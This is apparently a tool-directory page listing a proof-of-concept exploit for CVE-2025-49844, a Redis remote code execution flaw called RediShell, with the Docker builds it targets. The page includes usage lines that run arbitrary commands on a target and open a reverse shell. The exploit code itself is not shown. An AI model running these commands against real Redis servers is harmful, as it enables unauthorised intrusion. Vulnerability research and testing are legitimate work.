Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-49844 — Proof-of-concept for CVE-2025-49844 | Kitploit
Tools/GitHubGitHub/saneki/cve-2025-49844
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubsaneki/cve-2025-49844

cve-2025-49844

Proof-of-concept for CVE-2025-49844

View Repository
25629 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-49844

My personal proof-of-concept for CVE-2025-49844, also known as RediShell.

Supported target builds:

  • x86-64 Linux redis:8.2.1-alpine Docker image
  • x86-64 Linux redis:8.2.1-bookworm Docker image

It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had a great time investigating it.

Usage

Run one-way shell commands:

root@kitploit:~
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

Connect to a reverse shell:

root@kitploit:~
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
Download Tool